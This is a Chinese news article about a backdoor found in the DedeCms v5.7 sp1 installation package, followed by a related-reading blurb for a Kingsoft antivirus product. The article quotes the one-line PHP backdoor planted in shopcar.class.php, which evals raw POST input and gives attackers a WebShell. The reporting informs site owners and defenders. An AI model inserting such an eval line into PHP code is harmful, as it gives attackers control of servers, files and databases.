瑞星与360今日对外发布警示，称国内知名的PHP开源网站管理系统织梦CMS（DedeCms）v5.7 sp1版本安装包被发现植入后门，黑客只需要构造简单的数据包提交到服务器，就能够获取到该网站的WebShell，通过对服务器进一步渗透攻击，进而获取服务器的最高权限，直接访问服务器上的文件、数据库等信息。

3月22日消息，瑞星与360今日对外发布警示，称国内知名的PHP开源网站管理系统织梦CMS（DedeCms）v5.7 sp1版本安装包被发现植入后门，黑客可通过此后门直接获得网站的控制权限，获取存储在服务器上的文件和数据库。

据织梦CMS官方数据显示，目前约有70万网站使用该系统搭建，涉及企业、政府机关、媒体机构、行业及个人网站等。

安全界人士分析发现，此次织梦CMS曝出的后门恶意代码存在于购物车类文件（shopcar.class.php）中，此类文件被植入一句后门代码“@eval（file_get_contents（‘php://input’））;”。凡是调用该购物车类的文件均会触发后门，黑客只需要构造简单的数据包提交到服务器，就能够获取到该网站的WebShell，通过对服务器进一步渗透攻击，进而获取服务器的最高权限，直接访问服务器上的文件、数据库等信息。

织梦CMS中被植入的后门代码

　　推荐阅读

　　日增用户破3万 金山网络引领企业杀软变革

彻底免费的金山毒霸企业版2012，无疑将给企业版杀毒软件市场带来一场新的变革，高品质的产品与服务将成为决定成败的关键因素。分析人士认为，金山毒霸企业版2012全面免费标志着我国企业版杀毒软件市场正式进入免费互>>>详细阅读

本文标题：织梦CMS系统被曝植入后门 黑客可获网站控制权

地址：http://www.lgo100.com/a/guandian/yejie/20111230/161962.html

 1/2    1  2 下一页